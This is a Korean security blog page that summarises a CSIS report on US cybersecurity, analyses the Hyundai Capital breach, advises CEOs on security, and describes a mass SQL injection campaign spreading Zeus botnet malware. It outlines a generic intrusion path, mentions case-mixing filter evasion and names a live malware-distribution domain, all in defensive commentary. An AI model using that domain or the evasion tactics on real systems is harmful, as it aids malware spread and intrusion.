태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'security'에 해당되는 글 105건

  1. 2011.04.20 2년 후의 사이버 보안에 대하여 - 미국
  2. 2011.04.11 현대캐피탈 해킹. 시사점과 지금의 문제 (2)
  3. 2010.09.27 CEO,CTO가 알아야 할 보안 지식 혹은 상식
  4. 2010.08.17 세계 50만대 이상의 웹 서비스 봇넷 배포지로.. 그리고.. 의견
  5. 2010.07.06 [컬럼] 7.7 DDos 핵심은 무엇인가?
  6. 2010.06.15 에스토니아, 7.7 DDos 그리고 미래
  7. 2010.04.27 분석(8) 다이하드4.0 과 Cyber Terror
  8. 2010.04.27 wmf 이미지 공격을 통한 대규모 피해 우려
  9. 2010.04.27 Web 2.0 시대의 위험요소와 대책
  10. 2010.04.27 Threat of china 공격 분석 및 대책
  11. 2010.04.27 Threat of China II - 긴급 경고
  12. 2010.04.27 Security Paradigm의 변화와 현재의 위협
  13. 2010.04.27 RPC Worm 관련 문서
  14. 2010.04.27 MS 신규 패치 - Zero+1 day worm 출현?
  15. 2010.04.27 [컬럼]IT관리자들의 10가지 실수- 두번째
  16. 2010.04.27 IT 위험에 대비하기 위한 해커 집단의 필요성
  17. 2010.04.27 IT 보안 현황과 위협에 대한 전망
  18. 2010.04.27 Defcon CTF 그리고 한국의 보안
  19. 2010.04.27 CSS Virus PoC 코드 와 구글의 XSS 문제 수정
  20. 2010.04.27 Cyber Storm - US의 보안 대응
  21. 2010.04.27 CSI 컨퍼런스 참가 후기
  22. 2010.04.27 alzip 및 apache 신규 취약성 - 주의
  23. 2010.04.27 Active X를 이용한 사회공학적 해킹 기법
  24. 2010.04.27 BlackHat의 Web Worm 경고
  25. 2010.04.27 해킹시의 기업의 피해에 대한 생각
  26. 2010.04.27 해외진출 시의 보안 가이드
  27. 2010.04.27 한국의 보안 10점 만점에 5점!
  28. 2010.04.27 풀어쓴 SQL Injection 공격
  29. 2010.04.27 최악의 기업 보안 사례 5
  30. 2010.04.27 진정한 넷보안이란?
현재 상황에서 장기적 방향 설정에 도움이 될까 싶어 예전 공유한 내용을 게재합니다.


2011년 1월에 발표된 문서입니다.
CSIS에서 발표한 문서인데 간략한 구성을 가지고 있습니다.

간략하게 요약하면 다음과 같습니다.
"미국내의 보안적인 노력들은 여전히 부족한 부분을 가지고 있다.
 다양한 부분에서 노력을 하고 있지만 현재의 위협을 감당하기에는 여러 부분에 걸쳐서 부족하다."

미국은 사이버 보안을 국가의 안보를 위협하는 치명적인 요소로 2008년 부터 규정하고 진지한 노력을 해왔지만 2008년 이후 나타난 위협은 더 극한적인 상황에 내몰리고 있는 상황이다. 따라서 진지한 노력이 필요하고 지금까지 해오던 노력들의 재 점검과 방향성 검토가 필요하다 정도로 요약이 됩니다.

필요한 열가지 노력들에 대해서 언급을 했는데 고민을 해야 할 부분 같습니다.



1. 국가 우선순위로서 사이버 보안에 대한 인식과 연방정부 차원의 리더쉽과 조직력 배양을 위한 노력.
  - DHS와 DoD의 역할 분담과 더 추가적인 노력 부분들에 대해서 언급 합니다. 아인슈타인을 통해서 "Cloud"보안을 연방 정부 기관내에 구축하고 있으나 현실적으로 현재의 위협을 감당하기에는 부족함이 있다고 언급합니다.



2. 국가 기반시설의 사이버 보안에 대한 명확한 권한과 규정의 필요함과 프라이빗 영역과의 새로운 공조 방안의 개발 필요
 - OMB 언급 됩니다. (예산 관리청 입니다.)



3.   글로벌 인터넷을 위한 새로운 비전 창출을 위한 정책 제시 필요함. 사이버 공간상에서의 악의적인 행동들의 인과 관계와 통제에 대한 새로운 접근 방안, 사안 규정을 위한 미국의 힘의 집중을 통해 해외국가의 정책을 만들도록 하는 것 필요



4. 발전된 해외로 부터의 위협에 대해 첩보,군사 정보 능력의 활용을 확장한 역량 필요



5. 디지털 기술 채택을 통한 명확한 규칙과 프로세스를 통해 개인과 시민의 자유를 위한 시야를 강화



6. 국가기반시설에 대한 신원인증의 강화  ( 물리적, 온라인적)



7. 적합한 사이버 보안 기술의 채택을 통한 확장된 영역 구축
 - Human capitalism으로 촉발된 인력 유출의 위기에 대한 대안으로 제시하고 있습니다. 아마도 국가기관이나 연방기관에서의 민간 기술의 획득 및 가치에 대한 활용을 활발하게 할 것을 권고 하는 것으로 보입니다.



8. 보안이 강화된 제품과 서비스를 사용하도록 시장을 리딩하기 위해 연방 제품의 조달 관련 정책을 변경하는 것이 필요



9.  정책과 법적인 프레임웍을 재구성하여 정부차원의 사이버 보안 행동을 가이드 한다.



10. R&D는 사이버 보안의 어려운 문제에 집중하도록 하고 문제를 명확하게 하도록 하며 조정자의 관점에서 펀딩을 할당 하도록 하여 지원을 할 수 있도록 한다.




이상과 같이 간단하게 정리 했습니다. 여기는 국가기관 차원에서 민간 부분을 선도하고 가이드 하고 방향성을 제시할려고 하고 있습니다만 우리와는 조금 다른 측면이 있습니다. 역할도 그렇구요. ^^;

문서를 보시면 자세히 잘 나옵니다만 번역 관계 없이 주요 포인트들만 생각대로 의역 했습니다. 참고 하시고 보시면 될 것 같습니다.


다른 기사로는  DHS(국토안보부)에서 4000만 달러의 상금을 걸로 14개 가량의 기술적 분야에 대해 정부기관이나 인터넷 분야에서의 혁신적으로 보안성을 강화 시킬 수 있는 구조에 대해서 상금을 걸고 있습니다. 기술적 분야 하나 마다 400만불 가량의 상금을 걸고 있어서 좀 더 제안들이 구체화 될 것으로 보입니다. 

- 바다란 세상 가장 낮은 곳의 또 다른 이름
Posted by 바다란


기업과 시스템에 대한 보안이라는 것은 철학이 있어야 된다.
남들 하는 만큼만 한다는 자세는 비난을 피할 수는 있어도 절대 최선은 될 수 없다.
남과 다른 시도를 하는 것은 또한 최선은 될 수 있으나 시기어린 시선과 과도하다는 비난으로 부터 자유롭지 않다. 

경계선을 지킨 다는 것은 어렵다. 그러나 지금의 공격자들은 방어하는 입장에서 건들지 말았으면 하는 선들을 너무나도 잘안다. 계속 당 할 수 밖에 없는 이유기도 하다.

시스템과 조직이라는 것은 정문만 있는 것이 아니다. 지켜야 할 모든 것들은 원형을 이루고 있다. 즉 단방향의 통로만 존재하는 것이 아니라 아무리 최소화 하고 극소화 한다 하여도 한계를 가지게 마련이다.  

현대캐피탈의 해킹 사고를 보면서 오랜기간 침해사고를 맡았고 한 기업에서 5년 이상을 핵심적으로 역량을 기울인 부분이여서 안타까움과 함께 현재의 문제에 대해서 지적을 안 할 수가 없다. 

정문에만 4~5겹의 통로와 감시병을 세우면 뭐하는가? 창문은? 뒷문은?.. 그외 모든 통로들은?.. 성이 있어도 지금은 공중으로 날아 오는 판국이다. 이 상황에서 주변도 돌아보지 못하는 현 상황은 개탄스럽다.



기업의 보안성을 보자면 여러가지 분야가 있지만 기술적인 분야만 한정 하자면 다음과 같은 부분들을 보아야 한다.

네트워크 :

기업망의 네트워크가 충분히 세분화 되어 있고 각 단계에서 중요도가 선별이 되어 각각에 대한 제어가 되고 있는지가 중요하다. 내부 (특히 사설 IP를 쓴다고 안전하다는건 심각한 상황이다.) 망에서도 중요도 별로 선별이 되어야 하고 중요도에 따라 접근 영역도 달라야 한다. 특히 웹 서버의 경우에는 DB와 연결 되는 경우가 대부분인데 이 부분에 대해서도 구분과 대책이 필요하다고 할 수 있다. 실험 해보고 적용 해 본 것들은 여러가지 사례가 있지만 DB와 연결 지점, 연결 프로그램에 대한 제어와 모니터링이 가장 효과적인 방안으로 보고 있다.

그러면 국내에 대다수 기업들은 이렇게 하고 있을까?.. 많은 기업들은 하고 있지만 실효적인 유효성 보다는 정책과 연계된 형식적 프로세스 형태로 운용 하고 있을 가능성이 매우 높다. 즉 새는 구멍들은 계속 생길 수 있다는 것이다.


시스템:
 

공격자의 최종 목표는 결국에는 시스템에 대한 제어권한 획득이 목적이다. 이 목적을 위해 어플리케이션을 공격하고 네트워크망을 이용해 중요 시스템까지 접근 할 수 있도록 루트개척을 한다. ( 어차피 이 분야도 등산과 같다. 목적지에 도달하기 위해 거쳐야 하는 여러 포인트를 거칠 뿐인것이다. ) 목표가 되는 시스템은 항상 그렇듯이 회원관련된 정보나 현금화가 가능한 모든 것들이 포함된다. ( 소스코드 및 산업기밀 등도 모두 해당된다.)

이런 중요 시스템들은 대부분 내부의 보호되는 영역들에 존재한다고 믿고 있다. 그러나 이 보호되는 영역이 깨지는 것은 지금은 단순히 웹을 공격 함으로써도 가능하다. 일반적인 경로를 살펴보면  동일 네트워크나 같은 영역에 있을 것으로 예상되는 웹서버들에 대한 공격 -> 취약한 웹과 연결된 일부 DB 서버에 대한 권한 획득 -> 백도어 설치 -> 내부망 스캔 -> 내부망에서의 권한 획득 확대 -> 목표 달성 -> 외부로 부터 연결 가능하거나 명령 제어가 가능한 채널 설치 ..

위와 같이 볼 수 있다.  특별히 벗어나지도 않는다. 이 과정에서 중요한 것은 여러 포인트들에 대한 체계적인 관리와 집중적인 노력이 필요한 부분이 있다. 대부분의 보안 전문가나 관리자들은 개별 포인트에 집중하기도 한다. 종합적으로 보기가 어렵고 여건상 어려운 부분이 존재하기 때문이다. 이 부분은 보안전문가들이 결정권을 가지지 못하기에 발생 되기도 한다.

외부에 직접 노출된 시스템들은 보안성이 항상 높은 수준을 유지 하도록 강요된다. 그러나 내부에 있는 시스템들은 대부분의 사람들이 인지하듯이 외부 인터넷망과 분리 되어 있기 때문에 안전하다는 이유로 방치 되다시피 하고 있는것이 현실이다. 

공격자가 하나의 경로를 확보하게 되면 내부망을 휘젓는 것은 일도 아니다. 패치 안 된 다수의 시스템들.. 기본적인 보안 검사 없이 노출된 많은 어플리케이션들.. 포트 통제도 되지 않는 서비스들은 무지막지한 공격의 대상이 될 뿐이다. 더 문제가 되는 것은 내부망에서 발생되는 공격들을 탐지할 어떠한 것들도 가지고 있지 않다는 점이다. 대부분의 보호 도구들은 밖을 향해 있다. 내부에서 발생되는 공격들은 범위 밖인 것이다.

인지가 가능한 경우는 단지 서비스의 장애나 시스템의 리붓등이 발생 될 때에나 수동적으로 발견 할 뿐이다. 그렇지 않을 경우 발견 하기란 하늘의 별 따기이다.

언제 일어날 지 모를 내부에서의 사고를 위해 막대한 비용을 들여 기존의 보호 장치를 적용 할 수 있는 곳들은 많지 않다. DB에 대한 보호 조치나 암호화도 정답이 될 수 없는 것이 암호화를 푸는 모듈이 장착된 웹서비스나 어플을 공격 할 경우 암호화는 의미가 없어진다. 

시스템에 대한 최종 보호도구나 기본적인 감시 도구의 필요성은 이래서 필요하다. 폐쇄망에서의 치명적인 침해사고를 염려 하는 점도 위와 같은 이유에서다. 언젠가는 ( 곧) 발생 되겠지만 말이다.


어플리케이션:

가장 논란이 되는 부분이 어플리케이션이다. 기존의 많은 보호도구들이 네트워크나 시스템에 집중 되었다면 2005년을 기점으로  어플리케이션에 대한 공격이 전 세계에서 발생 되는 주요 공격의 대부분을 차지 하고 있다. 웜이나 바이러스를 통해 유출 되는 정보의 비율보다 어플리케이션 공격을 통해 자료를 유출하거나 전용하는 비율은 엄청난 차이를 보이고 있다. 기업망에서 중요하게 바라 보아야 하는 것은 지켜야 할 것이 무엇이고 연결된 것은 무엇이며 어떤 방식으로 안전성을 유지하며 단계적으로 해결을 하느냐는 점이다.

기업내에서도 많은 어플리케이션들이 개발되고 편리를 위해 운용이 된다.
그 접근의 편리함은 공격자에게도 동일하게 적용이 된다. 공격의 편리성도 똑같다는 의미이다.

외부에 노출된 많은 웹 애플리케이션들은 현재도 감당하기 힘든 공격들에 직면한 상태이고 매번 새롭게 개편이 되고 갱신이 될때마다 새로운 문제들에 노출이 된다. 근본적으로는 개발자에 대한 Secure coding이 습관화되고 고착 되어야 하지만 이 길은 너무나도 먼 길이다. 

개발 프로세스보다 더 긴 보안 점검 일정은 인내심의 한계를 촉발하고 대부분 개발자들에게 주어진 제한된 빠른 일정을 벗어나게 만든다. 또한 작은 페이지 하나 정도 추가 하는 것에도 1시간도 안걸리는 작업에 보안 점검이 하루 이상이 소요 된다면 모든 것은 문제가 될 수 밖에 없다.

개발자에 대한 교육을 하기 위해 Secure programming guide를 한다는 점도 좋은 시도이다. 그러나 방향성은 맞지만 현재 전 세계적인 방법론은 틀렸다고 본다. 일반 C/S 프로그래밍과 일정이 긴 소프트웨어 개발에는 맞는 방향일 수 있으나 현재 문제가 되고 있는 Web 어플리케이션에 대한 방향성과는 전혀 맞지가 않는다.

개발자가 구현 할 수 있는 창의성에 대한 제한, 또 교육과 습득에 까지 이르는 수많은 시간, 모든 것은 개인의 역량에 달린 문제여서 이직 할 경우는 처음부터 원점에서 다시 시작해야 하는점 등등.

소스코드를 점검 하기 위해서는 엄청난 출혈을 감내 해야만 한다. 비용과 인력, 시간등에 있어서 비용 대비 효과는 기대하기 어려운 부분이다. 그래도 방법이 없으니 쓸 수 밖에 없다.

많은 기업과 조직들이 이 문제 해결을 위해 웹 보안 도구를 사용 하고 있으나 우회 공격에 취약하며 또한 새로운 유형의 공격에 취약 할 수 밖에 없다. 또한 변화되는 네트웍 환경에 따른 오탐과 장애의 문제는 실질적인 문제이다.

개발자들이 손쉽게 문제가 되는 부분을 Live한 상황에서 실시간 점검을 하고 문제점을 해결 할 수 있다면 비용, 시간, 인력의 문제를 해결 할 수 있을텐데 아직 세계적으로 그런 서비스는 출현하지 않고 있다. 여러 구현의 어려움과 한계 때문에 출현이 없으나 웹 어플리케이션에 대한 Secure한 상태의 유지는 지금 당장 당면한 과제 이므로 반드시 되어야만 할 것이다. 

현재 미국에서는 소스코드 보안성을 강화하는 방향의 회사 제품을 국방부 차원에서 도입하여 적용하고 테스트를 하고 있다. 방안이 없기에 이럴 수 밖에 없다. 그러나 비용 대비 효과는 미미할 것으로 예상이 된다. 발전도 제한이 될 것이고 말이다.

이 문제를 해결 하기 위한 서비스를 준비 중에 있다. 곧 보실 수 있을 것이다. 완벽한 보안이 아닌 기본적인 보안 수준은 유지 할 수 있도록 하여 대규모 공격이나 일반적인 공격도구에는 당하지 않는 상태로 만들고 개발자들의 실시간 검사를 통해 기존 도구들이 가지는 한계를 한번에 넘길 수 있는 패러다임이라 할 수 있다.

현재 발생된 문제도 이 패러다임에서 벗어나지 못한다. 모든 애플리케이션에 대한 보안성 강화와 문제 해결을 할 수 없기에 주요 서비스에만 보안성을 강화하고 노력을 하였지만 문제는 모든 것은 이어져 있고 동일 대역 혹은 접근 가능 대역에 중요하지 않은 서비스들도 위치하고 있다는 점이다. 기사로만 유추해 보면 현대캐피탈의 문제도 여기에서 부터 비롯된 것이다.


정책:

정책적인 문제는 기술적 보안을 실행 하고 운영하기 위한 프로세스적인 정책을 의미한다. 일반적인 감시와 모니터링,통제를 위한 정책 부분은 지금의 상황 설명에는 문제가 있기에 연관성이 떨어진다고 할 수 있다. 정책적으로 모든 부분에 대해 문제가 없고 절차를 다 지켰다고 하여도 .. 관리가 덜 되고 있는 주변 서비스에 대한 집중 공격으로 진입점이 생긴 것에 대해서는 정책적으로 통제 한다는 것은 범위를 벗어난 이야기이다.

내부자에 대한 통제와 모니터링, 프로세스 체계에 관점을 가지고 있는 부분과는 현재 문제는 조금 다른 관점의 이야기라 할 수 있다. 여기에서 말하는 정책은 기술적 보안을 하기 위한 정책적 지원 관점에서 논의를 하는 것이며 그 관점에서 보게 되면 기존의 기술적 보안 방향에서는 전체 서비스 ( 규모가 클 수록 더 많은 인자를 가진다.)에 대해 일정수준 이상의 보안성을 유지 한다는 것은 엄청난 노력이 소요됨을 의미한다.

외부 보안업체와 긴밀한 협력 이외에도 내부 기술적 보안 인력의 역량과 리더십이 결합이 되어야 하며 모든 서비스에해 일정수준을 유지 하기 위해서는 최소 2년 이상의 전력질주가 필요하다. ( 필자의 경우에는 2년 정도가 소요 되었다. - 규모에 따라서 이 기간은 대폭 축소 될 수 있다. ) 전체 서비스에 대한 체계적인 진단과 문제점에 대한 팔로윙, 문제 해결의 적절성 검증이 필요하고 새로 만들어지고 변화되는 서비스에 대해서는 전체 문제점 진단하는 과정이 필요하다.

용어적으로는 보안진단과 보안성 검수라는 말로 정의 할 수 있다. 보안성을 테스트 하고 문제점을 해결 할때 계획을 수립하고 범위를 한정하여 진단하는 보안 진단과 개별 서비스에 대한 보안성 검수를 통해 문제를 해결 하는 과정으로 진행 할  수 있다.  현재 대부분이라 할 수 있는 IT 기술에 종속된 보안이라는 측면에서는 제한적인 부분들이 많을 수 밖에 없다. 이런 문제를 해결해 주는 체계적인 정책과 프로세스가 핵심이라 할 수 있다.


* 보안 전문가들의 의견이 받아 들여지지 않고 그들을 침묵하게 만드는 시스템과 체계라면 변화를 꿈꾸기 힘들 것이다. 단지 문서상으로 완전함을 보이기는 쉽다. 눈에 보이는 것을 실행 하고  상위에 보고 하는 것은 쉬우나 언제 결과가 나타날지 모르는 미래에 대해 준비를 하도록 만드는 것은 경영진의 철학이 없으면 안된다. 판단에 있어서 독선이 나타 나는 순간 최악은 금새 나타난다. 

규모에 맞는 보안성을 추구하고 방향성 차원에서 항상 돌아보고 의견을 존중해야 한다. 어려울때만 , 문제가 생겼을 때만 해결을 위해 보안 전문가들을 찾는 것이 아니라 상시적으로 이야기를 들을 수 있고 의견을 반영 할 수 있을때에야 문제 해결에 가까워 질 것이다.

투자와 노력 없이 사람을 닥달하여 얻을 수 있는 것은 이제 큰 한계에 직면 하고 있다.
겉으로 드러나지 않게 숨기고 위장하는 것도 한계에 도달한 상황이다. 


철학과 방향성을 잘 생각하라.

기업의 이득을 창출 하는 것은 미래 발생 가능한 손실을 얼마나 줄여가며 성장 동력을 유지하느냐에 있다. 손실의 범위는 기업의 흥망성쇠와 밀접한 관련을 가지고 있다. 소탐대실이라는 것은 국가든 조직이든 동일하다. 미래의 가능성을 보지 못할때 (전문가에 대한 의견 존중, 의견의 적극적 활용과 고민, 기술적 조직의 고도화 등등 매우 많다.) 문제는 이미 발생 되는 것이다.

당장 눈앞의 이득에 함몰되어 의견이 무시되는 순간 위험은 감내 할 각오가 필요하고 준비가 필요한 것이다. 그래야 다음을 기약 할 수 있다.

기사를 보다보니 단편적인 안타까움과 문제들이 눈에 보여 손가는 대로 써서 포스팅 한다.
각자 도움이 될 수 있는 부분이나 참고 할 수 있는 부분이 있다면 참고 하면 될 것이다. 차후 좀 더 여유가 생긴다면 체계적으로 작성을 할 수 있도록 하겠다.


- 바다란 세상 가장 낮은 곳의 또 다른 이름.

 
Posted by 바다란

 

정보보호 21에 기고한 컬럼 입니다. - p4ssion@gmail.com

 

지금의 시대는 속도를 따라가기 어려울 정도로 빠르게 변화하고 있다. 특히 IT기업의 CEO라면 알아야 될 기술의 종류와 표준, 변화는 크고 다양해서 따라가기가 힘겨울 정도다. 아이폰으로 촉발된 모바일 접속환경의 변화와 생활의 변화는 소셜 네트워크에 강력한 힘을 실어주고 있다. 접속환경의 변화는 서비스를 변화시키고 서비스의 변화는 국외뿐 아니라 국내에서도 기업환경에 많은 변화를 가져오고 있다. 이 현상은 점차 더 심화될 것이다.

환경의 변화를 살펴보고 향후 미래의 경영환경을 예측하는 것은 CEO들에게 가장 중요한 숙제이자 과제이다. 간략하게 살펴보면 IT기기의 변화와 사용 형태의 변화는 향후의 환경이 다양한 단말기기로부터 정보를 획득하고 재생산되며 부분적으로는 기업의 고용형태를 변화시킬 수도 있다.

역동적으로 변화해가는 환경에서 기존의 보안이라는 개념은 상당히 협소적인 의미에만 지금껏 머물러 있었다. 일반적으로 보안이라고 여겼을 때 바이러스나 직접적인 해킹만을 염두에 두고 보안장비나 소프트웨어를 구매하고 설치를 하였다. 또한 법제화된 법안 준수를 위해 다양한 종류의 인증을 받거나 추진하는 형태가 일반적 이였다.

위협은 시간이 지날수록 변화해 가고 진화해 가는데 대응방식은 여전히 오래 전의 개념에 머물러 있는 것이 사실이다. CEO가 알아야 할 기본적인 보안상식 혹은 지식은 변화된 환경에 맞추어서 달라져야 하며 경영환경의 변화에 따라 충분히 역동적 이여야 한다.

기본적인 보안도구들은 그 기본에 충실한 역할을 할 뿐이다. 글로벌 환경에서의 다국적기업들의 변화를 살펴보면 특히 IT기업의 경우 핵심 부분에 보안이라는 역할을 포함 시키는 환경을 쉽게 관찰 할 수 있다. 8월에 있었던 인텔의 맥아피 인수는 향후 환경의 변화를 살짝 엿볼 수 있다. 또한 구글, MS, 어도비와 같은 글로벌 IT기업들은 내부적으로 보안기술의 획득과 역량을 확보하기 위해 다양한 노력을 하고 있다.

왜 그들은 기본적인 보안으로도 충분 하게 여기지 않고 더 많은 역량확보를 하기 위해 노력을 하고 있을까? 환경의 변화에 따라 시스템에 대한 직접적인 공격은 감소하고 있고 표면적으로 심각하게 드러나지 않고 있다. 그러나 구글의 검색서비스를 이용한 자동화된 해킹기법과 어도비의 PDF나 Flash의 취약성을 이용한 공격, MS의 운영체제 혹은 어플리케이션에 대한 공격을 통해 사용자에 대한 위협은 실제화 되고 있다.

공격 기술의 변화는 이제 서비스를 직접 공격하거나 서비스의 구조를 이용한 공격으로 상당부분 전이가 되고 있다. 서비스를 보호하지 않는 기업의 제품이나 서비스들은 지속적으로 사라질 수 밖에 없다. 위험성이 있는 소프트웨어나 서비스는 이제 사용자에게 직접적인 영향을 미치고 그 결과는 서비스의 존폐에도 영향을 미치기 때문이다.

현재의 글로벌 IT기업들의 움직임은 단순히 보안을 개별 요소기술로 보는 것이 아니라 전체 서비스의 경쟁력을 확보하기 위한 필수적인 요소로서 활용을 하고 있는 것이다. 보안에 대한 많은 노력들은 실제로는 서비스를 보호하기 위해서는 내부의 구조를 강하게 만들거나 다양한 취약성이 존재하고 있는 서비스나 제품을 즉시적으로 또는 상시적으로 보완을 해야 하고 보호조치를 취해야 하기 때문이다. 그래야만 경쟁력을 가지기 때문에 노력하는 것이다.

단순히 장비의 성능으로 경쟁에서 이길 수 없다. 보다 더 중요한 것은 플랫폼이고 서비스이다. 앞으로의 환경 변화도 플랫폼과 서비스에서 촉발이 될 것이고 여기에서 주도권을 가지는 기업이 앞서나가게 될 것이다. 이 주도권을 쥐게 해주는 핵심 부분은 아이디어와 혁신성 이외에 보안에서 판가름 나게 될 수 밖에 없다. 폐쇄적인 환경에서 개방적인 환경으로 전환되는 과정은 서비스의 도움 없이는 어렵다. 국내의 IT기업 및 서비스를 하는 기업이라면 이 점을 염두에 두어야만 한다.

위험은 이제 기본적인 보안 위협 (바이러스, 웜, 직접해킹)을 포함하면서 더 나아간 서비스 구조에 대한 공격으로 진화되어 있다. 단순한 보안장비로서는 이제 대응이 어려운 측면에 진입한 것이다. 백신에 탐지되지 않는 악성코드들과 날마다 새롭게 쏟아지는 소프트웨어들의 취약성은 사용자의 정보를 빼내어간다. 종래에는 서비스의 훼손과 공격자의 이득창출을 위해 빼내간 정보들은 고스란히 활용이 된다. 이것을 보호하지 못하면 서비스의 신뢰도는 보장 받을 수 없으며 해외 진출은 언감생심일 수 밖에 없다.

CEO가 알아야 할 보안 지식은 변화의 인지로부터 시작되어야 하고 지금의 변화를 느낄 수 있어야 효과적일 수 밖에 없다. 현재의 환경의 변화를 간단히 정리해 보자.

 

 

1. 공격 형태의 변화 : 직접적인 해킹에서 사용자 정보를 유출하는 형태로 변화됨

2. 서비스에 대한 공격 증가: 유출한 정보를 이용한 서비스 공격이 늘어나고 있다.

3. 경쟁력 있는 서비스에는 보안적인 기능은 필수적이다.

4. 기존의 보안장비로 탐지 할 수 없는 신규 공격과 대규모 공격이 일상화 되어 있다.

5. 접속 환경의 변화에 따른 다양한 단말기기로부터의 공격 증가 예상

 

 

 

기업의 업무환경 변화도 기본적인 보안 지식이 없다면 황당한 일들은 언제나 발생하게 마련이다. 보안전문가들에게 자문을 구하거나 문제점을 확인하고 보완하지 않는다면 위협은 이제 일상적일 수 밖에 없다. 단순히 휴대폰으로 PC를 통제하거나 사내메일을 확인 하는 편리성을 강조한 방식들은 편리함이 증가한 만큼 위험도 그에 비례하여 늘어날 수 밖에 없다.

새로운 시대를 대비하거나 준비하기 위해서는 이제 진지한 고민이 있어야 하고 IT기업 혹은 IT 서비스를 기획하는 곳들은 성장하고 싶고 세계시장에 진출하고 싶다면 보안적인 기능에 많은 역할을 부여해야만 할 것이다. 품질관리 (Quality Assurance)는 단순히 하드웨어 제품에만 있는 절차가 아니며 서비스와 소프트웨어에도 필수적 이여야 한다. 특히 보안이 강화된 품질관리 (SQA – Secured Quality Assurance) 는 시대가 요구하는 과정이 될 것이다.

환경의 변화는 지금 보안적인 기능의 강화가 절실하게 요구됨을 말하고 있다. 또 그것이 경쟁력이 될 것임을 의미하고 있다. 9조원의 현금으로 맥아피를 인수한 인텔이 왜 그랬을까? 한번쯤 고민해야 할 주제가 아닐까 싶다.

 

- 바다란 세상 가장 낮은 곳의 또 다른 이름.

Posted by 바다란

세계 50만대 이상의 웹 서비스 봇넷 배포지로.. 그리고..

 

관련기사: http://www.thetechherald.com/article.php/201033/6024/TTH-Labs-New-SQL-Injection-attack-hits-thousands-of-sites

 

일상적인 일중의 하나로 치부되고 있는 대규모 해킹은 지금도 맹위를 떨치고 있다.

Mass SQL Injection 도구에 의한 해킹 피해는 나날이 도를 더해가고 있는 상황에서 우리가 할 수 있는 일은 무력하기만 하다. 규모가 있는 사이트들은 자체 역량 및 외부 보안업체의 도움을 통해 보안성을 강화하고 문제를 해결 하지만 현재 피해를 입는 사이트들은 일부 보안이 된 사이트들을 포함하여 역량이 부족한 사이트들이 피해를 입고 있다.

 

결국 피해는 개인에게로 돌아오고 사회적 도구로서 자리매김을 확고히 한 IT 서비스의 근간을 흔들게 될 것임은 자명하다.

 

피해의 순서는 웹 서비스 정보 유출 -> 웹 서비스를 통한 악성코드 유포 -> 개인정보 유출 -> 다시 웹 서비스에 대한 Abusement로 이어진다. 유출된 사용자 정보는 금융 정보 및 ID/PW를 막론하고 다시 재활용되고 혼란스러워진다.

 

이미 지난 글에서 (http://p4ssion.com/241) “웹 서비스 보안의 불편한 진실이라는 항목으로 피해의 심각성과 향후의 문제들에 대해서 기술한 바 있다. 동일한 상황은 계속해서 이어 질 수 밖에 없다. 구글에 의해 표시된 악성코드 감염 수치는 55만개 이상의 웹 서비스에서 악성코드가 유포되고 있음을 나타내고 있다.

 

Malware count

Malware count

또한 국내의 사이트로 한정을 하면 1만대 이상의 웹 서비스를 통해 악성코드가 유포되는 현실을 볼 수 있다.

사용자 삽입 이미지

악성코드의 특성에 대한 내용은 이미 별도의 블로그(http://www.moonslab.com/1072)에 정리된 내용이 있어서 상세한 분석은 생략하며 특징만을 간략하게 언급 하도록 한다. 기술적인 분석에 대해서는 SANS의 분석 내용을 참고 하면 된다. (http://isc.sans.edu/diary.html?storyid=9397)

 

특징

 

현재 악성코드가 연결된 사이트는 .ru 라는 러시아 도메인을 가지고 있다. 그러나 등록된 주소는 중국으로 되어 있으며 실제 주소도 중국으로 판명이 되고 있다. 일차적인 특징으로 볼 수 있는 내용인데 중국의 공격자들이 이제는 도메인을 위장하여 손쉽게 판별되는 .cn 도메인을 넘어서 타 국가의 도메인을 활용하고 있음을 볼 수 있다.

 

두 번째로는 설치되는 악성코드의 다양함을 들 수 있다. 실제 분석은 되지 않았지만 구글에서 파악된 기본적인 내용을 살펴 보면 13개의 Trojan 9개 이상의 Exploit 코드들이 유포 되었음을 알 수 있다.  (http://www.google.com/safebrowsing/diagnostic?site=nemohuildiin.ru/&hl=en )

 

세번째로는 봇넷 채널을 직접 연결하여 Zeus Botnet과 연결된 가능성이 매우 높다는 점이다. 웹을 통해 악성코드를 유포하고 감염된 개인 PC들은 봇넷 Agent로 활용이 되는 것이다. 금융정보 및 키입력 정보, 화면 정보를 모두 유출 시키며 원격에서 직접 통제가 가능한 도구로 손쉽게 활용이 된다는 점이다.

 

Zeus Botnet은 국내에는 일반인들에게 잘 알려져 있지는 않지만 해외에서는 금융적인 피해가 직접 발생 하고 있어서 신경을 많이 쓰고 있는 Botnet이라 할 수 있다.

 

Black Market에서 가장 순도 있고 가치 있는 정보를 빼내고 직접 활용이 가능하다는 점에서 가치가 높은 BotNet 이라고도 불려 진다.

 

기존에 존재하던 웹 보안 장비들은 대부분 공격패턴을 인식하여 차단하는 유형으로 구성이 되어 있다. 그러나 공격기법은 계속 변화한다. 대소문자를 섞어서 쓴다든지 ASCII 코드값을 직접 입력 하는 유형등과 같은 변형된 공격기법은 헤아릴 수도 없이 많이 존재한다. 수없이 많은 패턴을 유지하는 보안장비들은 그만큼 속도가 느려질 수 밖에 없으며 보안적인 위협을 막기 위한 목적으로 도입한 장비들이 본 서비스의 접근 속도를 느리게 하는 요소로서 작용 할 수도 있다.

 

국내의 보안 현실 및 세계적인 보안의 근본적인 문제점은 대중과는 어느 정도 거리가 있는 사후 대응의 측면에만 집중하는 것이 현실이다. 근본적인 유포망을 없애지 않고서는 악성코드로 인한 개인 정보 유출의 피해와 또 유출된 개인정보로 인한 서비스망의 교란과 혼란은 개인과 서비스를 운영하는 기업 모두에게 큰 손실이 될 수 밖에 없고 문제는 점차 더 커질 수 밖에 없다.

 

 

 

빈익빈 부익부

 

빈익빈 부익부의 현실은 깊어만 간다. 현재의 IT서비스의 현황을 살펴보면 빈자들의 서비스에는 보안을 신경 쓸 여력이 없고 서비스 운영에만 중점을 두고 있어서 실질적인 이득 창출과는 약간 거리가 있게 느껴지는 보안 분야는 등한시 되고 있는 실정이다.

그러나 조금 만 더 멀리 보면 보안은 기업의 이익을 보호하고 신뢰를 형성하여 장기적인 안정성을 유지할 수 있게 한다는 점에서 큰 이득이 될 수 밖에 없다.

 

